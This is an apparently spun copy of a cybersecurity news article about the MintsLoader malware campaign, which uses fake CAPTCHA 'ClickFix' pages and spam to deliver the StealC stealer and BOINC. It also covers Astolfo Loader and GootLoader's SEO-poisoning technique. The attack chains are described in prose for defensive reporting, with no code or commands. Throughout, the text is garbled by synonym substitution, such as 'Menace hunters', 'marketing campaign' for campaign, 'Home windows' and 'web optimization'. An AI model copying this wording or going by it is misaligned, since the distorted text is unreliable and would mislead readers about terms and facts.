Menace hunters have detailed an ongoing marketing campaign that leverages a malware loader referred to as MintsLoader to distribute secondary payloads such because the StealC data stealer and a authentic open-source community computing platform referred to as BOINC.
“MintsLoader is a PowerShell based malware loader that has been seen delivered via spam emails with a link to Kongtuke/ClickFix pages or a JScript file,” cybersecurity agency eSentire mentioned in an evaluation.
The marketing campaign has focused electrical energy, oil and gasoline, and the authorized providers sectors in the USA and Europe, per the corporate, which detected the exercise in early January 2025.
The event comes amid a spike in malicious campaigns which are abusing faux CAPTCHA verification prompts to trick customers into copying and executing PowerShell scripts to get across the checks, a method that has come to be identified ClickFix and KongTuke.
“KongTuke involves an injected script that currently causes associated websites to display fake ‘verify you are human’ pages,” Palo Alto Networks Unit 42 mentioned in a report detailing an analogous marketing campaign distributing BOINC.
“These fake verification pages load a potential victim’s Windows copy/paste buffer with malicious PowerShell script. The page also gives detailed instructions asking potential victims to paste and execute the script in a Run window.”
The assault chain documented by eSentire begins when customers click on on a hyperlink in a spam e mail, resulting in the obtain of an obfuscated JavaScript file. The script is liable for working a PowerShell command to obtain MintsLoader through curl and execute it, after which it deletes itself from the host to keep away from leaving traces.
Alternate sequences redirect the message recipients to ClickFix-style pages that result in the supply of MintsLoader via the Home windows Run immediate.
The loader malware, in flip, contacts a command-and-control (C2) server to fetch interim PowerShell payloads that performs varied checks to evade sandboxes and resist evaluation efforts. It additionally contains a Area Era Algorithm (DGA) with a seed worth primarily based on the addition of the present day of the month to create the C2 area identify.
The assault culminates with the deployment of StealC, an data stealer offered beneath the malware-as-a-service (MaaS) mannequin since early 2023. It is assessed to be re-engineered from one other stealer malware generally known as Arkei. One of many notable options of the malware is its capability to keep away from infecting machines positioned in Russia, Ukraine, Belarus, Kazakhstan, or Uzbekistan.
Information of the MintsLoader marketing campaign additionally follows the emergence of an up to date model of the JinxLoader dubbed Astolfo Loader (aka Jinx V3) that has been rewritten in C++ probably for efficiency causes after its supply code was offered off by the malware creator Rendnza to 2 separate patrons Delfin and AstolfoLoader.
“While @Delfin claims to be selling JinxLoaderV2 unchanged, @AstolfoLoader opted to rebrand the malware and modify the stub to C++ (Jinx V3), instead of using the original Go-compiled binary,” BlackBerry famous late final yr.
“Services like JinxLoader and its successor, Astolfo Loader (Jinx V3), exemplify how such tools can proliferate quickly and affordably and can be purchased via popular public hacking forums that are accessible to virtually anyone with an Internet connection.”
Cybersecurity researchers have additionally make clear the inside workings of the GootLoader malware campaigns, that are identified to weaponize SEO (web optimization) poisoning to redirect victims looking for agreements and contracts to compromised WordPress websites that host a realistic-looking message board to obtain a file that accommodates what they’re purportedly in search of.
The malware operators have been discovered to make modifications to the WordPress websites that trigger these websites to dynamically load the faux discussion board web page content material from one other server, known as the “mothership” by Sophos.
GootLoader campaigns, apart from geofencing IP tackle ranges and permitting requests to originate from particular international locations of curiosity, go additional by allowing the potential sufferer to go to the contaminated web site solely as soon as in 24 hours by including the IP to a block listing.
“Every aspect of this process is obfuscated to such a degree that even the owners of the compromised WordPress pages often cannot identify the modifications in their own site or trigger the GootLoader code to run when they visit their own pages,” safety researcher Gabor Szappanos mentioned.
